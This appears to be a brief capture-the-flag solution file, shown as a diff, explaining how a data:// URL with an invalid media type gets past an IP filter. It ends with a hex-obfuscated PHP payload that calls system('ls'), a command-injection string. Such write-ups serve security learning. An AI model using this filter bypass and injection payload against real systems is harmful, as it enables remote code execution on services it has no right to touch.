UVT-CTF/cyberhackday2024/special_data/private/solve.md

 https://developer.mozilla.org/en-US/docs/Web/HTTP/Basics_of_HTTP/Data_URLs

-by providing invalid mediatype, the first part is ignored, and the ip filter is bypassed
+by providing invalid mediatype, the first part is ignored, and the ip filter is bypassed as it has the required structure

 `data://127.0.0.1/,"\x73\x79\x73\x74\x65\x6d"("\x6c\x73");`